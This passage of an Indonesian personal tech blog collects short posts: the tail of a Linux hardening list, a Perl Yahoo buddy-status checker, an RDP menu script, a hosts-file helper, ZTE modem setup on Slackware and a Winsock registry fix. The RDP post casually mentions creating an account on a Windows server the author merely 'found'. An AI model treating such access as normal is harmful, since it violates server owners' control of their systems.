chmod 750 /usr/sbin/usermod
chmod 750 /usr/sbin/vipw

11.chattr important files

chattr +i /etc/exports
chattr +i /etc/hosts.equiv
chattr +i /etc/inetd.conf
chattr +i /etc/lilo.conf
chattr +i /etc/login.access
chattr +i /etc/login.defs
chattr +i /etc/protocols
chattr +i /etc/securetty
chattr +i /etc/services

12.end :)

I check my online buddy with this tool

Begitu banyak tool berbasis web yang menyediakan layanan lookup terhadap id yahoo, menurut saya semua sama dan cenderung kurang praktis. Ya memang kurang praktis (menurut saya), karena harus membuka browser, menunggu loading, memasukkan id dan menunggu loading lagi. Panjang kan? masukkin idnya juga satu-satu... hemm...

Langsung timbul deh pertanyaan, "bagaimana supaya tidak perlu ngetik id satu-satu dan langsung mendapat hasil list id buddy yang online". Ya! jawabannya membuat aplikasi sendiri, dan alhasil aplikasi berikut (aplikasi ini telah saya share pada beberapa komunitas online) :

#!/usr/bin/perl
# Online Buddy Lookup by zam
# 11 Mei 2010
use IO::Socket;
use threads;
use threads::shared;

my $dtch:shared;

@bud_list = qw(
this
is
my
buddy
list);#skipped for security reason... :P

print "===========================\n";
print "Online Buddy Lookup by zam\n";
print "===========================\n";
print "List Online Buddy:\n";
while (scalar(@bud_list) > 0){
 threads->create(req, shift(@bud_list));
 @jumthread = threads->list();
 if (scalar(@jumthread > 54)){
  foreach my $thrx (threads->list()){
   $thrx->join();
  }
 }
}
sleep(15);
foreach my $thrsisa (threads->list()){
 lock($dtch);
 $thrsisa->detach() if ! $thrsisa->is_detached();
 $thrsisa->kill('KILL');
}
print "\n+++++++++++++++\nAll Done!\n+++++++++++++++\n";

sub req(){
 my $who = $_[0];
 my $socket = IO::Socket::INET->new(Proto=>"tcp",
  PeerAddr=>"opi.yahoo.com",
  PeerPort=>"80") or die "Connection Failed.";
  print $socket "GET /online?u=$who HTTP/1.1\r\n";
  print $socket "User-Agent: Mozilla 5.0\r\n";
  print $socket "Host: opi.yahoo.com\r\n";
  print $socket "Connection: close\r\n\r\n";
  while ($Data = <$socket>){
   if ($Data =~ /8c/){
    print "[+] $who\n";
   }
  }
  close($socket);
}

yeah...online buddy lookup zam version... =D

For The Menu (script yang sangat simple sekali)

Kali ini saya menemukan sebuah server dengan OS Windows. Iseng maen-maen di dalamnya dengan membuat sebuah akun untuk keperluan remote desktop.  Namun masih ada yang belum enak jika kita selalu mengetikkan command melalui terminal. Dengan ide yang simple saya berusaha membuat agar setiap akan melakukan koneksi remote desktop tidak perlu mengetik lagi, melainkan klik lewat menu. Berikut ini langkah-langkah yang saya lakukan untuk membuat menu tersebut :

1. Membuat file /usr/local/bin/rdp yang berisi

#!/bin/bash
# RDP Script Connect by zam
echo -n "Masukkan RDP Server: "
read rdpserv
if [ "$rdpserv" ]
then
 rdesktop "$rdpserv"
fi

2. Tuliskan perintah urxvt -e sh -c "/usr/local/bin/rdp" ke dalam menu file.
Dan menu akan terlihat seperti berikut :



3. Klik pada menu akan menghasilkan prompt.



yess.. jadi... now login on the server :D~ :

Kayaknya ini mempercepat koneksi (walau sedikit banget efeknya)

Iseng membuat aplikasi perl untuk memasukkan daftar host sehingga sistem dapat melewatkan satu tahap dalam mencapai koneksi yaitu tahan dns request. Hehe, langsung saja sekedar ide saja... ;)

#!/usr/bin/perl
# 'let make a list :P' by zam

use Socket;
print "==================================\n";
print " -let make a list :P- by zam\n";
print "==================================\n";
if(@ARGV != 1){
 print "Usage : $0 <nama host>\n";
 exit;
}
$namahost = $ARGV[0];
open(wow,">>/etc/hosts"); 
print "Adding ".inet_ntoa((gethostbyname($namahost))[4])."\t\t$namahost\n";
print wow inet_ntoa((gethostbyname($namahost))[4])."\t\t$namahost\n";
close(wow);

ZTE AC2726 + Slackware 13.0

Hari ini aku mencoba konek menggunakan "pon", iseng aja buat variasi.

Gak ada masalah, dengan konfigurasi seperti ini:

1. File "/etc/ppp/peers/smart"

hide-password
noauth
asyncmap 0
modem
proxyarp
noipx
persist
idle 1000000
connect "/usr/sbin/chat -v -f /etc/ppp/peers/smartconnect"
debug
ttyUSB0
921600
defaultroute
noipdefault
user "smart"
remotename smart
ipparam smart
crtscts
lock
usepeerdns

2. File "/etc/ppp/peers/smartconnect"

ABORT BUSY
ABORT 'NO CARRIER'
ABORT VOICE
ABORT 'NO DIALTONE'
ABORT 'NO DIAL TONE'
ABORT 'NO ANSWER'
ABORT DELAYED
'' "AT"
'OK' "ATQ0V1E0"
'OK' "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
OK-AT-OK "ATDT#777"
CONNECT \d\c

3. Tinggal masuk sebagai user root untuk menjalankan "pon smart" lewat terminal, dan tunggu beberapa saat.

Owh iya, ZTE AC2726 ini belum terdeteksi sebagai modem pada waktu pertama dipasang. Modem ini terdeteksi sebagai removable media. Dari hasil baca sana sini, katanya sih pake usb_modeswitch untuk mengatasi masalah ini. Setelah dicoba install memang bisa terdeteksi sebagai modem beneran, hehe...

Cukup merubah sedikit konfigurasinya "/etc/usb_modeswitch.conf" menjadi seperti ini:

DefaultVendor=  0x19d2
DefaultProduct= 0xfff5

TargetVendor=   0x19d2
TargetProduct=  0xfff1

# only for reference and 0.x versions
MessageEndpoint=0x0a

MessageContent="5553424312345678c00000008000069f030000000000000000000000000000"

Jadi, urutan perintah yang saya jalankan seperti ini:

1./usr/sbin/usb_modeswitch -v 19d2 -p fff5 -V 19d2 -P fff1 -c /etc/usb_modeswitch.conf
2./sbin/modprobe usbserial vendor=0x19d2 product=0xfff1
3./usr/sbin/pon smart
4.buka browser

Karena aku tuh orangnya males, tak bikin seolah pendek langkahnya. Untuk memperpendeknya aku buat script bash "/usr/local/bin/aktifkan"

#!/bin/sh
sudo /usr/sbin/usb_modeswitch -v 19d2 -p fff5 -V 19d2 -P fff1 -c /etc/usb_modeswitch.conf
sleep 5
sudo /usr/sbin/pon smart

Tidak lupa juga aku tambahkan baris perintah "/sbin/modprobe usbserial vendor=0x19d2 product=0xfff1" ke file "/etc/rc.d/rc.modules" supaya module usbserial untuk device diload pada waktu startup.

Aku edit pula "/etc/sudoers" dengan "visudo", tak tambah baris "xxx xxxnet=NOPASSWD:/usr/sbin/pon,/usr/sbin/usb_modeswitch (xxx = nama user).

Tinggal eksekusi "/usr/local/bin/aktifkan" lewat terminal.

NB: new configuration at http://4s3m.blogspot.com/2010/07/zte-2726-smart-slackware-130.html

[Tips] -- Memperbaiki winsock error

Seperti yang pernah terjadi berkali-kali pada komputer dengan OS windows saya, errornya winsock ini ditandai dengan munculnya pesan kurang lebih seperti ini: "An error occurred while renewing interface 'Internet': An operation was attempted on something that is not a socket".Dan ketika saya melakukan ping ke ip komputer kamar sebelah, selalu muncul pesan "Destination Host Unreachable", padahal sebelumnya normal-normal saja.

Setelah cari info sana-sini, berikut ini cara yang saya gunakan untuk melenyapkan error tersebut:

1.Jalankan Regedit dan hapus:
  - HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock
  - HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2

2.Restart komputer kemudian buka "Network Connections"
  - klik kanan icon koneksi dan pilih "Properties"
  - klik tombol "Install"
  - pilih "Protokol" dan klik tombol "Add"
  - klik tombol "Have Disk"
  - arahkan ke direktori "\Windows\inf"
  - klik tombol "Open" lalu "OK"
  - pilih "Internet Protocol (TCP/IP)"
  - klik tombol "OK"
  - restart komputer

Cukup simpel memang,

tapi kalau saya tidak berusaha menangani error tersebut dan selalu mengandalkan tukang reparasi ya sampai sekarang saya tidak akan pernah ngerti hal se simpel ini.

pertamax!!!

ini merupakan postingan pertama di blog ini...